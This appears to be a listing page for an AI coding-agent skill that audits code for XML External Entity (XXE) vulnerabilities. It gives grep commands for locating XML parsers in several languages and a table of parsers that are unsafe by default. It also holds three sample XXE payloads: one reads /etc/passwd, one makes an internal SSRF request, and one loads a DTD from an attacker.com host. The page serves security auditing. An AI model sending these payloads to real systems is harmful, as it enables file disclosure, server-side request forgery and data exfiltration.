Stats
Actions
Tags
From find-cve-agent
Detects XXE vulnerabilities in XML parsers processing untrusted input across JavaScript, TypeScript, Python, Go, Ruby, PHP, Java. Guides auditing configurations, defaults, and input flows for file read/SSRF risks.
How this skill is triggered — by the user, by Claude, or both
Slash command
/find-cve-agent:xxeThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Audit XML processing endpoints, SOAP services, document importers (DOCX/XLSX/SVG), and any code that parses XML from untrusted sources.
Audit XML processing endpoints, SOAP services, document importers (DOCX/XLSX/SVG), and any code that parses XML from untrusted sources.
file://, http://) -- reads files or makes HTTP requestsBoth can exist in the same parser, but they are different vulnerabilities.
# JavaScript
grep -rn "DOMParser\|XMLParser\|xml2js\|libxmljs\|xmldom\|sax\|saxes" .
# Python
grep -rn "xml\.etree\|lxml\|minidom\|xml\.sax\|defusedxml\|xmltodict" .
# Go
grep -rn "xml\.Decoder\|xml\.Unmarshal\|encoding/xml" .
# Java
grep -rn "DocumentBuilder\|SAXParser\|XMLReader\|TransformerFactory\|SchemaFactory" .
# PHP
grep -rn "simplexml\|DOMDocument\|XMLReader\|xml_parse" .
# Ruby
grep -rn "Nokogiri\|REXML\|Ox\|LibXML" .
grep -rn "FEATURE_SECURE_PROCESSING\|FEATURE_EXTERNAL_ENTITIES\|FEATURE_GENERAL_ENTITIES" .
grep -rn "resolve_entities\|external_entities\|load_external\|noent\|nonet" .
grep -rn "disallow-doctype-decl\|external-general-entities\|external-parameter-entities" .
grep -rn "XXE\|external.*entity\|doctype" .
Most modern parsers are SAFE by default. Key exceptions:
| Parser | Default External Entities | Safe? |
|---|---|---|
| xml.etree (Python) | Enabled | UNSAFE |
| xml.sax (Python) | Enabled | UNSAFE |
| lxml (Python) | Disabled | SAFE |
| defusedxml (Python) | Disabled | SAFE |
| encoding/xml (Go) | No entity support | SAFE |
| Nokogiri (Ruby) | Disabled | SAFE |
| REXML (Ruby) | Enabled | UNSAFE |
| libxml2 (C) | Depends on flags | CHECK |
| Java DocumentBuilder | Enabled | UNSAFE |
| PHP simplexml | Depends on libxml2 config | CHECK |
| PHP DOMDocument | Depends on libxml2 config | CHECK |
Does untrusted XML reach the parser? Common sources:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server/api/secret">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>test</root>
npx claudepluginhub byamb4/find-cve-agentDisables external entity processing and DTD loading in XML parsers to prevent file disclosure, SSRF, and DoS attacks from XXE. Provides code examples for Python, Java, and other languages.
Guides XML External Entity injection testing: classic XXE, blind XXE (OOB), XXE via file upload (SVG/docx), SOAP/REST XXE, error-based XXE, XInclude, and filter bypass. For authorized web app security assessments or bug bounty.
Discovers and exploits XML External Entity (XXE) injection vulnerabilities to read server files, perform SSRF, and exfiltrate data during authorized penetration tests.